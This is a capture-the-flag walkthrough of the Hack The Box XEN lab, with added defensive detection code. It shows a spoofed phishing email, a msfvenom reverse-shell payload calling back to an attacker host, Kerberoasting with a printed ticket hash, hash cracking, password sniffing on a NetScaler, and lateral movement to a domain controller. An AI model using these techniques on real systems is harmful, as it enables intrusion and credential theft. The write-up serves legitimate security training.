Hack The Box – XEN (retired June 2020)
First, I added the IP of the machine, 10.13.38.12, to /etc/hosts as xen.htb.
NMAP
As always, we start with an nmap scan.
E:\PENTEST>nmap -A -oN htb-endgame-xen 10.13.38.12
Starting Nmap 7.70 ( https://nmap.org ) at 2020-04-09 14:41 W. Europe Summer Time
Stats: 0:00:43 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 66.67% done; ETC: 14:42 (0:00:11 remaining)
Nmap scan report for humongousretail.com (10.13.38.12)
Host is up (0.024s latency).
Not shown: 997 filtered ports
PORT    STATE SERVICE  VERSION
25/tcp  open  smtp
| fingerprint-strings:
|   GenericLines, GetRequest:
|     220 ESMTP MAIL Service ready (EXCHANGE.HTB.LOCAL)
|     sequence of commands
|     sequence of commands
|   Hello:
|     220 ESMTP MAIL Service ready (EXCHANGE.HTB.LOCAL)
|     EHLO Invalid domain address.
|   Help:
|     220 ESMTP MAIL Service ready (EXCHANGE.HTB.LOCAL)
|     DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
|   NULL:
|_    220 ESMTP MAIL Service ready (EXCHANGE.HTB.LOCAL)
| smtp-commands: CITRIX, SIZE 20480000, AUTH LOGIN, HELP,
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
80/tcp  open  http     Microsoft IIS httpd 7.5
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Humongous Retail
443/tcp open  ssl/http Microsoft IIS httpd 7.5
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Humongous Retail
| ssl-cert: Subject: commonName=humongousretail.com
| Subject Alternative Name: DNS:humongousretail.com
| Not valid before: 2019-03-31T21:05:35
|_Not valid after:  2039-03-31T21:15:35
|_ssl-date: 2020-04-09T12:42:58+00:00; +9s from scanner time.
| sslv2:
|   SSLv2 supported
|   ciphers:
|     SSL2_RC4_128_WITH_MD5
|_    SSL2_DES_192_EDE3_CBC_WITH_MD5
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port25-TCP:V=7.70%I=7%D=4/9%Time=5E8F182C%P=i686-pc-windows-windows%r(N
SF:ULL,33,"220\x20ESMTP\x20MAIL\x20Service\x20ready\x20\(EXCHANGE\.HTB\.LO
SF:CAL\)\r\n")%r(Hello,55,"220\x20ESMTP\x20MAIL\x20Service\x20ready\x20\(E
SF:XCHANGE\.HTB\.LOCAL\)\r\n501\x20EHLO\x20Invalid\x20domain\x20address\.\
SF:r\n")%r(Help,6F,"220\x20ESMTP\x20MAIL\x20Service\x20ready\x20\(EXCHANGE
SF:\.HTB\.LOCAL\)\r\n211\x20DATA\x20HELO\x20EHLO\x20MAIL\x20NOOP\x20QUIT\x
SF:20RCPT\x20RSET\x20SAML\x20TURN\x20VRFY\r\n")%r(GenericLines,6F,"220\x20
SF:ESMTP\x20MAIL\x20Service\x20ready\x20\(EXCHANGE\.HTB\.LOCAL\)\r\n503\x2
SF:0Bad\x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20c
SF:ommands\r\n")%r(GetRequest,6F,"220\x20ESMTP\x20MAIL\x20Service\x20ready
SF:\x20\(EXCHANGE\.HTB\.LOCAL\)\r\n503\x20Bad\x20sequence\x20of\x20command
SF:s\r\n503\x20Bad\x20sequence\x20of\x20commands\r\n");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: specialized|general purpose|phone
Running (JUST GUESSING): Microsoft Windows 7|8|Phone|2008|8.1|Vista (91%)
OS CPE: cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1
Aggressive OS guesses: Microsoft Windows Embedded Standard 7 (91%), Microsoft Windows 8.1 Update 1 (91%), Microsoft Windows Phone 7.5 or 8.0 (91%), Microsoft Windows 7 or Windows Server 2008 R2 (90%), Microsoft Windows Server 2008 (90%), Microsoft Windows Server 2008 R2 (90%), Microsoft Windows Server 2008 R2 or Windows 8.1 (90%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (90%), Microsoft Windows 7 (90%), Microsoft Windows 7 Professional or Windows 8 (90%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 8s, deviation: 0s, median: 8s

TRACEROUTE (using port 443/tcp)
HOP RTT      ADDRESS
1   24.00 ms 10.14.14.1
2   24.00 ms humongousretail.com (10.13.38.12)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 60.99 seconds
E:\PENTEST>
It seems we have HTTP and HTTPS on ports 80 and 443, and SMTP on port 25.
Overview of Web Services
Let’s take a quick look at the webpages to see what we have. Port 80 redirected me to port 443, and the certificate presented for the site revealed a new domain, humongousretail.com.
I didn’t have much to go on, so I decided to do some directory enumeration.
Directory Enumeration
I used wfuzz in this case because gobuster didn’t come up with anything useful.
wfuzz --hc 404 -w raft-small-words.txt http://10.13.38.12/FUZZ
Web Directories
There were several other directories that seemed interesting, but the ones I wanted to look at were Remote and Jakarta.
Opening https://humongousretail.com/remote, I got the following.
And browsing https://humongousretail.com/jakarta, I got the following.
I had a look at these for some time to see if I could come up with anything useful; I looked deeper into the directories and searched for known exploits for the XenApp application. Knowing this environment is called XEN, I decided to concentrate my efforts on the remote directory rather than Jakarta. After spending some more time on this, I decided to investigate the SMTP service. I had seen examples in the past where the users were very responsive.
SMTP Enumeration
I had the domain name of the company, so I decided to see if I could find any email addresses and somehow get a response from someone.
smtp-user-enum -M RCPT -U ./usernames.txt -D humongousretail.com -t 10.13.38.12
I found 4 addresses:
- sales@humongousretail.com
- it@humongousretail.com
- marketing@humongousretail.com
- legal@humongousretail.com
Now that I had these 4 addresses, I needed to ensure that I could send mail through. I decided to use an internal address to try and get a response from someone.
User Response
To see if I was getting a response, I had a listener running to capture anything that may come through.
nc -nlvp 80
I then attempted a lot of different emails with a lot of different subjects. I eventually got a hit with the subject "Remote". My idea was to try to get the users to click on my link. The mail was as follows:
telnet 10.13.38.12 25
helo humongousretail.com
MAIL FROM: it@hunongousretail.com
RCPT TO: sales@humongousretail.com
DATA
Subject: Remote Portal

Hi,
The URL for the remote portal has now been changed to http://10.14.15.106
Regards
IT
.
QUIT
I chose to do this because a mail from the IT department sent out to a group of people would hopefully get me something. Users should trust an email coming from IT, or so you would think.
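The two SMTP behaviours above, RCPT-based recipient enumeration and a spoofed internal sender, are both visible on the receiving mail server. The following is an added example (not part of the original write-up) of the detection logic a defender would run over the MTA's logs: the 250/550 split per recipient that smtp-user-enum relies on shows up as a burst of rejected RCPT commands from one client, and the fake "IT" mail shows up as a MAIL FROM claiming the organisation's own domain from an address outside its network. The log format, the internal network range and the sample lines are constructed for this example; map the fields onto your own MTA's log format.

```python
import ipaddress
import re
from collections import Counter

LOCAL_DOMAIN = "humongousretail.com"
# Assumption for this example: the mail server's own network; anything else is "external".
INTERNAL_NETS = [ipaddress.ip_network("10.13.38.0/24")]
RCPT_REJECT_THRESHOLD = 5

# Constructed sample log lines in a deliberately simple key=value format
# (not the page's server log and not a real Exchange or Postfix format).
SAMPLE_LOG = """\
2020-04-09T14:50:01 client=10.14.15.106 cmd=RCPT arg=<admin@humongousretail.com> code=550
2020-04-09T14:50:01 client=10.14.15.106 cmd=RCPT arg=<root@humongousretail.com> code=550
2020-04-09T14:50:01 client=10.14.15.106 cmd=RCPT arg=<test@humongousretail.com> code=550
2020-04-09T14:50:02 client=10.14.15.106 cmd=RCPT arg=<info@humongousretail.com> code=550
2020-04-09T14:50:02 client=10.14.15.106 cmd=RCPT arg=<sales@humongousretail.com> code=250
2020-04-09T14:50:02 client=10.14.15.106 cmd=RCPT arg=<hr@humongousretail.com> code=550
2020-04-09T14:50:03 client=10.14.15.106 cmd=RCPT arg=<it@humongousretail.com> code=250
2020-04-09T14:50:03 client=10.14.15.106 cmd=RCPT arg=<ceo@humongousretail.com> code=550
2020-04-09T14:55:10 client=10.14.15.106 cmd=MAIL arg=<it@humongousretail.com> code=250
2020-04-09T14:55:40 client=10.13.38.50 cmd=MAIL arg=<jdoe@humongousretail.com> code=250
2020-04-09T14:56:02 client=203.0.113.7 cmd=MAIL arg=<partner@example.net> code=250
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) client=(?P<client>\S+) cmd=(?P<cmd>[A-Z]+) "
    r"arg=<(?P<arg>[^>]*)> code=(?P<code>\d{3})$"
)


def parse_log(text):
    """Parse log lines into dicts; lines that do not match the format are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            events.append(m.groupdict())
    return events


def is_internal(ip):
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def detect_rcpt_enumeration(events, threshold=RCPT_REJECT_THRESHOLD):
    """Clients whose RCPT TO commands were rejected (5xx) at least `threshold` times.
    A server that answers 250 for valid and 550 for unknown recipients is the oracle
    recipient enumeration depends on; rate-limit or make the answers uniform."""
    rejects = Counter(
        e["client"] for e in events
        if e["cmd"] == "RCPT" and e["code"].startswith("5")
    )
    return {client: n for client, n in rejects.items() if n >= threshold}


def detect_spoofed_sender(events, local_domain=LOCAL_DOMAIN):
    """MAIL FROM envelopes claiming the local domain that did not come from an internal host."""
    hits = []
    for e in events:
        if e["cmd"] != "MAIL":
            continue
        domain = e["arg"].rpartition("@")[2].lower()
        if domain == local_domain and not is_internal(e["client"]):
            hits.append((e["client"], e["arg"]))
    return hits


if __name__ == "__main__":
    events = parse_log(SAMPLE_LOG)
    for client, n in detect_rcpt_enumeration(events).items():
        print(f"possible recipient enumeration from {client}: {n} rejected RCPT commands")
    for client, sender in detect_spoofed_sender(events):
        print(f"external host {client} claimed local sender {sender}")
```

The sender check is deliberately narrow: it only asks whether an outside host used the local domain in the envelope, which is the condition the mail above satisfied. In production the same decision is what an SPF or DMARC policy makes at the border, so the check here mainly serves to show which single field in the log carries the signal.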
Once the email had been sent, I didn’t get a reply, but 30 seconds later I had some data returned. It was a user clicking on the link to the new portal and providing their credentials.
I had a username of pmorgan and a password of Summer1Summer!. Although I knew this had worked, I tried again to make sure I had it right, and got a response from a different user.
I now had another user: jmendes, with password VivaBARC3L0N@!!!.
I kept this up to see if I could get any more responses, and I got one more.
The last response gave me the user awardel with password @M3m3ntoM0ri@. I now had 3 users:
pmorgan:Summer1Summer!
jmendes:VivaBARC3L0N@!!!
awardel:@M3m3ntoM0ri@
Citrix XenApp
I had the 3 users and knew that they must work somewhere. I browsed to the remote site and entered the credentials of pmorgan.
And I now had access to a desktop.
I tried this for each user that I had, and each of them worked and logged in successfully.
I clicked on the Desktop to access it and was asked to open the launch.ica file, which defaulted to open with the Citrix Receiver Engine after I installed icaclientWeb_19.12.0.19_amd64.deb on Kali.
Once I had clicked OK, I was presented with a Desktop. I browsed to the user’s Desktop and was presented with the 1st flag.
1 – XEN{wh0_n33d5_2f@?} Breach
Gaining a shell
Now that I had access to the desktops, I wanted to get a shell to see if I could elevate my privileges. I first made a note of all the users and the desktops they were assigned to.
I created the reverse shell payload I wanted so that I could get a meterpreter session.
msfvenom --platform windows -p windows/meterpreter/reverse_tcp LHOST=10.14.15.106 LPORT=10086 -f exe -o x86exploit.exe
I then proceeded to set up msfconsole as follows.
Now that I had everything set up, I started SimpleHTTPServer so that I could download the file needed to exploit the system.
python -m SimpleHTTPServer 80
I then browsed to my machine from the virtual desktop and downloaded the file.
I now started the exploit and got a meterpreter shell.
Privilege Escalation on Desktop
Now that I had a meterpreter shell, I wanted to see if I could elevate my privileges. I decided to use the local exploit suggester.
I first put my session in the background and started the suggester.
use post/multi/recon/local_exploit_suggester
Seeing the results from the suggester, I decided on the AlwaysInstallElevated exploit.
use exploit/windows/local/always_install_elevated
I had successfully raised my privileges. I looked to see what was on the Administrator’s Desktop and found the second flag.
2 – XEN{7ru573d_1n574ll3r5} Deploy
Further Enumeration
Now that I had a way into the internal network, which I could see was 172.16.249.0/24, I wanted to perform a quick scan of it to identify hosts. To pivot within the internal network, I used a SOCKS proxy within msf.
use auxiliary/server/socks4a
Now that I had done this, I wanted to see which hosts were live on the internal network. Knowing the IPs of the desktops, I chose to scan only a small range, between .199 and .210.
I found an additional 3 IPs:
- 172.16.249.200 (DC)
- 172.16.249.201 (Citrix)
- 172.16.249.202 (NetScaler)
With a domain controller identified, I decided to use a technique I had used in a previous engagement called Kerberoasting.
With the SYSTEM shell that I had earlier, I uploaded the Kerberoasting tool (Rubeus).
Further credentials
I now wanted to see if there were any further credentials that I could find.
PS C:\Users\pmorgan\Desktop> .\Rubeus.exe kerberoast /outfile:service_ticket.txt

  Rubeus v1.4.2

[*] Action: Kerberoasting
[*] NOTICE: AES hashes will be returned for AES-enabled accounts.
[*]         Use /ticket:X or /tgtdeleg to force RC4_HMAC for these accounts.
[*] Searching the current domain for Kerberoastable users
[*] Found 1 user(s) to Kerberoast!
[*] SamAccountName         : mturner
[*] DistinguishedName      : CN=Mark Turner,OU=Contractors,DC=htb,DC=local
[*] ServicePrincipalName   : MSSQLSvc/CITRIXTEST.HTB.LOCAL:1433
[*] Supported ETypes       : RC4_HMAC_DEFAULT
[*] Hash written to C:\Users\pmorgan\Desktop\service_ticket.txt
[*] Roasted hashes written to : C:\Users\pmorgan\Desktop\service_ticket.txt

PS C:\Users\pmorgan\Desktop> dir

    Directory: C:\Users\pmorgan\Desktop

Mode        LastWriteTime         Length Name
----        -------------         ------ ----
-a---   4/4/2020  11:13 AM             7 cmd.bat
-ar--   4/6/2019  11:11 PM            19 flag.txt
-a---  2/20/2020   6:53 PM         41534 Invoke-Portscan.ps1
-a---  3/26/2020  10:56 AM      16128568 netscan64.exe
-a---   4/6/2020   8:57 PM           295 netscan64.lic
-a---   4/6/2020   8:57 PM         39301 netscan64.xml
-a---  2/20/2020   6:30 PM        770279 powerview-dev.ps1
-a---  9/22/2019  10:20 AM        883600 putty.exe
-a--- 11/27/2019   2:17 PM        198144 Rubeus.exe
-a---   4/6/2020   9:12 PM          2172 service_ticket.txt
-a---  3/28/2020  11:17 AM        832512 SharpHound.exe
-a---  3/28/2020  11:17 AM        973323 SharpHound.ps1
-a---   4/6/2020   8:59 PM         32665 winPEAS.bat
-a---   4/6/2020   8:59 PM        241152 winPEAS.exe

[to get a proper command prompt we use:]
PS C:\Users\pmorgan\Desktop> type cmd.cmd
cmd.exe
PS C:\Users\pmorgan\Desktop> type service_ticket.txt
$krb5tgs$23$*mturner$htb.local$MSSQLSvc/CITRIXTEST.HTB.LOCAL:1433*$107F90C880956CA6ABBBAB4F9C2FB71B$15B748ACB9F233974753E8F01B946449197403730D59DB4B2D72E600B8C7AC5D3178F52A1C5562A1146824D2F33756CBF95D70EAC796B6F1D006FF6CF3DC1D1EA05B6E9839D67AA634F7B0FD24C1CE69F7CE49B5314CCFA49D074BEA3A457E5EEA9F91822E7F1676439ED137A54E5ADF1546A6AB5CA3B808EECC77A5F2E94880B39457CD714425340EA8DFE186B9A90BE5C541D990C6C7E0C82F95043A81DC85DF709CF7E45151B022EA8275C4ED2F0578F9462847F9E1CF21BEFBA5FB187A810DFAD7D2D62C04785842CBD44BB1B8AA94E9D9EFA691A8FF54392210C635E8B004C42E4F71EFF3EC30599A33F1F434A1705FF4378E553071A6A974FB58569CCFDE795E39492AD893BDBF55916EA6763D63C1CF476ABA8FC24790F8954C80B5503147681BDA02EB8A9DDE56DE33A266851AFC99E72A6E08C5CA6BD127EC9AAA3BD3AE026E94BD481FF3583A28C9A3CF408110C4FF8551A27E615A15F0125AAB8761E8D5B1DA35858BE845D031F253E46EBE6987A94D1A8848820511226F95C4F0E27798E575F179C06EBB12C76EEAFD4CA977E085A392B06EB805033A229C26504AA8EB871041346DAB4B92D5400B030C6CFA0EE853656F4AAAF857F04B30D0BF7376B37634CE0DD3D82B78A3005E5C3E174915960674AE255995A3B37AFC82944D87920BE43302DFF9EAC0D559298D943FAFFBA118DA31688858C415342B729949B6366B07F3A8AD9B3B310A73EB689C38A087C4E05D9917DC46E01B25C808B7A3F93449E1E5CD7CA02018EA77DD3E339BDDF6ACF4CCC991BDAFB45E9809F9C12CF9358C5D07ABFA105E90206EE59B7ED6D5161BA186AF275AEC9B046B0E600585750BC259FA108CD62A0CFF191F4A30EFEE4BAFECCE07F3BAC3A22055672F4E761D220D5F8E1CB4BD51FA5BDCC8CDA524A709A389A31E913174455592CE322BFD32E572A7DF97C599E05CC3771A4FA952B9C34B273AD284DF237187EDCEAF2922AFBE3C4927E67B2B5FEA3F9AB57AD47436031EDB5A8D4C5D31FACF307E8CAAD66D61D6760CA3B9A4EDF10B0F6315B9D3FA7F7118EC6AA446F4642883D7DAF016CB4F7F8F3DB305AD0F6CB087FA149B4C439EE164B6B809EFD1A2FABDD115D77B1371B06968C8E6479BFB94C51763EE71A064D445D28FE30EF81EE3FDDF437C495305913C30F4B99E749187F1C09DD3DC10DD39B23AD5A84BE8CA906D3C01770CD71291FBC43D3D2A61E0DBD651106BFE97B6F2DFFF1A70F0BC825BD68D3B791CD67211162BA7C021D606FA0AD46175FF04E785607F186885802F0305F04876A5657CE9DB0BAECEBA1F2593DC7C8B70B295DE3D0F47
201CD149232DCBB303853A4042677C96F9E286A06A8AB54F3FAAE0B3DCF2D92D76F511FB11492364C8AF22AC6F0462E039D66F74025BB76BC870B94388D69FD1295DF592C6205B8871BD55FCC5429EDCB690719836
PS C:\Users\pmorgan\Desktop> copy "\\Client\D$\SharpHound.ps1" .
PS C:\Users\pmorgan\Desktop> Set-ExecutionPolicy -Scope CurrentUser
PS C:\Users\pmorgan\Desktop> Bypass
PS C:\Users\pmorgan\Desktop> .\Sharphound
PS C:\Users\pmorgan\Desktop> Import-Module .\SharpHound.ps1
PS C:\Users\pmorgan\Desktop> get-help Invoke-BloodHound
PS C:\Users\pmorgan\Desktop> Invoke-BloodHound -CollectionMethod All
PS C:\Users\pmorgan\Desktop> copy .\service_ticket.txt \\Client\D$\
PS C:\Users\pmorgan\Desktop> copy "\\Client\D$\netscan64.exe" .
PS C:\Users\pmorgan\Desktop>
PS C:\Users\pmorgan\Desktop> Import-Module .\powerview-dev.ps1
PS C:\Users\pmorgan\Desktop> Get-NetUser
PS C:\Users\pmorgan\Desktop> Get-NetUser | Ft samAccountName
I copied the contents of this ticket to a file named mturner so that I could run it through hashcat.
I exhausted all the password lists that I had with this and decided to look up some hashcat rules online to see what I could come up with. I eventually found a ruleset that had potential at https://github.com/NSAKEY/nsa-rules.git.
hashcat -m 13100 ./mturner rockyou.txt -r rules/_NSAKEY.v2.dive.rule --debug-mode=1 --debug-file=matched.rule --force -O
After several hours, I eventually got a hit on the password.
We now know that the password for mturner is 4install!
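The service ticket above is in the format both Rubeus (earlier) and impacket's GetUserSPNs.py (further down, where the SPN's colon appears as a tilde) emit: `$krb5tgs$<etype>$*account$realm$SPN*$checksum$encrypted-data`. Everything a defender needs to judge the exposure is in the clear part of that string, before any cracking. The following parser is an added example, not code from the write-up or from either tool; the two sample strings are constructed in that format with filler checksum and ciphertext, not a real ticket. It reads out the encryption type, the account and the SPN, and states why etype 23 (RC4-HMAC) on a user account is the case worth fixing: the RC4 key is the account's NT hash, so each offline guess costs a single MD4, whereas AES keys go through PBKDF2.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Kerberos TGS-REP encryption types and the hashcat modes that target them.
HASHCAT_MODE = {23: 13100, 17: 19600, 18: 19700}
ETYPE_NAME = {23: "RC4-HMAC", 17: "AES128-CTS-HMAC-SHA1-96", 18: "AES256-CTS-HMAC-SHA1-96"}

TICKET_RE = re.compile(
    r"^\$krb5tgs\$(?P<etype>\d+)\$"   # format marker and Kerberos encryption type
    r"\*(?P<account>[^*]+?)\$"        # *SamAccountName (computer accounts end in '$')
    r"(?P<realm>[^$*]+)\$"            # realm
    r"(?P<spn>[^$*]+)\*\$"            # ServicePrincipalName*
    r"(?P<checksum>[0-9a-fA-F]+)\$"   # ticket checksum
    r"(?P<edata>[0-9a-fA-F]+)$"       # encrypted ticket part
)


@dataclass
class RoastedTicket:
    etype: int
    account: str
    realm: str
    spn: str
    checksum: str
    edata: str

    @property
    def hashcat_mode(self) -> Optional[int]:
        return HASHCAT_MODE.get(self.etype)

    @property
    def is_user_account(self) -> bool:
        # Computer accounts end in '$' and have long random passwords; SPNs on
        # ordinary user accounts with human-chosen passwords are the real exposure.
        return not self.account.endswith("$")

    @property
    def service_host_port(self):
        service, _, rest = self.spn.partition("/")
        host, _, port = rest.partition(":")
        return service, host.lower(), int(port) if port.isdigit() else None


def parse_kerberoast_hash(line: str) -> RoastedTicket:
    m = TICKET_RE.match(line.strip())
    if not m:
        raise ValueError("not in $krb5tgs$<etype>$*account$realm$spn*$checksum$edata format")
    etype = int(m["etype"])
    # GetUserSPNs.py writes the ':' in the SPN as '~' (see the page's output); Rubeus keeps ':'.
    spn = m["spn"].replace("~", ":")
    checksum = m["checksum"].lower()
    if etype == 23 and len(checksum) != 32:
        raise ValueError("RC4-HMAC checksum must be 16 bytes (32 hex characters)")
    return RoastedTicket(etype, m["account"], m["realm"].upper(), spn, checksum, m["edata"].lower())


def findings(t: RoastedTicket):
    """Defender-oriented observations about one roasted ticket."""
    notes = []
    if t.etype == 23:
        notes.append("ticket encrypted with RC4-HMAC: the key is the account's NT hash; "
                     "restrict msDS-SupportedEncryptionTypes on the account to AES")
    else:
        notes.append(f"ticket encrypted with {ETYPE_NAME.get(t.etype, 'etype %d' % t.etype)}")
    if t.is_user_account:
        notes.append("SPN registered on a user account: use a long random password or a gMSA")
    service, host, port = t.service_host_port
    notes.append(f"service {service} on {host}" + (f":{port}" if port else ""))
    return notes


# Constructed samples (same layout as the page's Rubeus and GetUserSPNs.py output;
# checksum and encrypted data are filler, not a real ticket).
FILLER_CHECKSUM = "0123456789abcdef0123456789abcdef"
FILLER_EDATA = "deadbeef" * 16
SAMPLE_RUBEUS = f"$krb5tgs$23$*mturner$htb.local$MSSQLSvc/CITRIXTEST.HTB.LOCAL:1433*${FILLER_CHECKSUM}${FILLER_EDATA}"
SAMPLE_IMPACKET = f"$krb5tgs$23$*mturner$HTB.LOCAL$MSSQLSvc/CITRIXTEST.HTB.LOCAL~1433*${FILLER_CHECKSUM}${FILLER_EDATA}"

if __name__ == "__main__":
    for sample in (SAMPLE_RUBEUS, SAMPLE_IMPACKET):
        ticket = parse_kerberoast_hash(sample)
        print(ticket.account, ticket.realm, ticket.spn, "hashcat mode", ticket.hashcat_mode)
        for note in findings(ticket):
            print("  -", note)
```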
SMB Access
Now that I had the new credentials, I looked around a little more to see what else I could find. I eventually found SMB on 172.16.249.201 and decided to use the credentials to see if I could access anything.
proxychains smbmap -u mturner -p '4install!' -d htb.local -H 172.16.249.201
This showed that we had read access to the files located in the Citrix$ share. I connected to it with smbclient to see what was inside.
proxychains smbclient \\\\172.16.249.201\\Citrix$ -U htb.local\\mturner
I was presented with some interesting files. The two of interest at this point are flag.txt and private.ppk.
I downloaded these files and was able to read the next flag.
3 – XEN{l364cy_5pn5_ftw} Ghost
PuTTY file conversion
Now that I had a PuTTY private key file, I had a look at its contents to see if I could get a hint at anything.
It seems this could be used in PuTTY, but it has a password on it too. I needed to crack the password before I could proceed. I decided to convert it with putty2john.
putty2john private.ppk > private.hash
Now that I had this file in a readable format for john, I tried to crack the password.
After several hours, all my password lists came up empty. I was unable to crack the password with what I had. I decided to look elsewhere for something I could use as a password list generator. I found a generator that seemed interesting and decided to run with it: https://github.com/hashcat/kwprocessor
./kwp -o passes basechars/tiny.base keymaps/en-gb.keymap routes/2-to-32-max-5-directionchanges.route
Once I had the password list generated, I put it through john to try to crack the key again.
john -w=./passes private.hash
Now that I knew the password for the file, I could convert it for use on my system. To do this, I used puttygen.
puttygen private.ppk -O private-openssh -o id_rsa
I now had a key file that I could use.
Access to NetScaler
During information gathering I had accumulated many user IDs, and I tried all of them with the private key to get onto the SSH service of the NetScaler. I then quickly found that the default username of these devices is nsroot, and attempted to log in with it.
proxychains ssh -i id_rsa nsroot@172.16.249.202
Now that I had access to the NetScaler as root of the device, I hunted around to see if I could find anything. After a while of searching, I did not come up with anything useful. Remembering that the device is essentially a firewall and router, I decided to listen to the traffic passing through it, and remembered a specific article at https://hackertarget.com/tcpdump-examples/.
I attempted this to see if I would get any results.
tcpdump -s 0 -A -n -l | egrep -i "POST /|pwd=|passwd=|password=|Host:"
4 – XEN{bu7_ld4p5_15_4_h455l3} Camouflage
LDAP
Knowing that I had access to this box as root, I wanted to perform some additional tests to see what other traffic was being passed through it. The previous flag seemed to suggest LDAP could be in use. I set up tcpdump to capture this for me.
tcpdump -w capture.pcap
I now had to transfer the file back to my machine for investigation. I used scp for this.
proxychains scp -i id_rsa nsroot@172.16.249.202:/root/capture.pcap .
I then opened this file within Wireshark to see what I could find.
Now going from the previous hint, I searched for the LDAP traffic and found a password.
The password I had found was #S3rvice#@cc, which belonged to the netscaler-svc account.
msf > use auxiliary/server/socks4a
msf > set srvport 8888
msf > route add 172.16.249.0 255.255.255.0 1
msf exploit
root@kali:~/htb/xen# proxychains GetUserSPNs.py -request -dc-ip 172.16.249.200 HTB.LOCAL/netscaler-svc:#S3rvice#@cc
ProxyChains-3.1 (http://proxychains.sf.net)
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

|S-chain|-<>-127.0.0.1:8888-<><>-172.16.249.200:389-<><>-OK
ServicePrincipalName                Name     MemberOf                                 PasswordLastSet             LastLogon
----------------------------------  -------  ---------------------------------------  --------------------------  --------------------------
MSSQLSvc/CITRIXTEST.HTB.LOCAL:1433  mturner  CN=Deployment,OU=Groups,DC=htb,DC=local  2019-02-13 23:23:48.796612  2019-04-10 22:14:57.105936

|S-chain|-<>-127.0.0.1:8888-<><>-172.16.249.200:88-<><>-OK
|S-chain|-<>-127.0.0.1:8888-<><>-172.16.249.200:88-<><>-OK
|S-chain|-<>-127.0.0.1:8888-<><>-172.16.249.200:88-<><>-OK
$krb5tgs$23$*mturner$HTB.LOCAL$MSSQLSvc/CITRIXTEST.HTB.LOCAL~1433*$30e2233e1b0123f3c7579d9f7a2384fb$
root@kali:~/xen# proxychains smbmap -u mturner -p '4install!' -d htb.local -H 172.16.249.201
ProxyChains-3.1 (http://proxychains.sf.net)
[+] Finding open SMB ports....
|S-chain|-<>-127.0.0.1:1080-<><>-172.16.249.201:445-<><>-OK
|S-chain|-<>-127.0.0.1:1080-<><>-172.16.249.201:445-<><>-OK
|S-chain|-<>-127.0.0.1:1080-<><>-172.16.249.201:445-<><>-OK
[+] User SMB session establishd on 172.16.249.201...
[+] IP: 172.16.249.201:445	Name: 172.16.249.201
	Disk                                                  	Permissions
	----                                                  	-----------
	ADMIN$                                            	NO ACCESS
	C$                                                	NO ACCESS
	Citrix$                                           	READ ONLY
	IPC$                                              	NO ACCESS
	ISOs                                              	NO ACCESS
	ISOs-TEST                                         	NO ACCESS
root@kali:~/xen#
root@kali:~/xen# proxychains smbclient \\\\172.16.249.201\\Citrix$ -U htb.local\\mturner
ProxyChains-3.1 (http://proxychains.sf.net)
WARNING: The "syslog" option is deprecated
|S-chain|-<>-127.0.0.1:1080-<><>-172.16.249.201:445-<><>-OK
Enter HTB.LOCAL\mturner's password: 4install!
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Wed May  8 18:12:51 2019
  ..                                  D        0  Wed May  8 18:12:51 2019
  Deploying-XenServer-5.6.pdf         A   997001  Tue Feb 12 18:21:10 2019
  flag.txt                           AR       20  Sun Mar 31 11:25:10 2019
  private.ppk                         A     1486  Wed May  8 18:21:51 2019
  XenServer-5-6-SHG.pdf               A  1747587  Tue Feb 12 18:21:32 2019

		10485247 blocks of size 4096. 6344443 blocks available
Doppelganger
The term doppelganger refers to a non-biologically related look-alike (Wikipedia). This gave me the hint to look back at the other accounts that were active on the domain. I immediately got a shell again on the desktop and looked up the domain details.
I was looking for an account that hopefully resembled the netscaler-svc account I had found.
After all, I had tried this account in so many different places to access different resources and none were successful.
net user /domain
After a few attempts at usernames, I discovered that backup-svc had the same password as the NetScaler account. These two accounts essentially shared the same password: this was our doppelganger. I then tried to log in to the Domain Controller using WinRM through proxychains, because I knew the account was a member of the Backup Operators group, which generally has access.
proxychains ruby winrm_shell_with_upload.rb
root@kali:~/xen# proxychains ruby winrmshell2withupload.rb
ProxyChains-3.1 (http://proxychains.sf.net)
|S-chain|-<>-127.0.0.1:1080-<><>-172.16.249.200:5985-<><>-OK
PS htb\backup-svc@DC Documents>
PS htb\backup-svc@DC Desktop> type flag.txt
XEN{y_5h4r3d_p@55w0Rd5?}
PS htb\backup-svc@DC Desktop>
I looked on the Desktop of backup-svc and found the next flag.
5 – XEN{y_5h4r3d_p@55w0Rd5?} Doppelganger
Privileges
Now that I was on the box, I wanted to see what privileges I had, to understand what else could be achieved by simply logging in through WinRM.
whoami /priv
This was interesting. It seemed I had a few privileges, including Backup and Restore. This seemed obvious, though, with the account being named backup-svc.
I first tried to access the Administrator Desktop and was denied access.
From this I knew something had to be done with the backup privileges. I had recently done an exercise in the office where I work on retrieving the Active Directory database to extract the hashes. This is something I do on a regular basis, and I therefore knew I would have to create a shadow copy of the drive to even attempt to gain access to the NTDS.
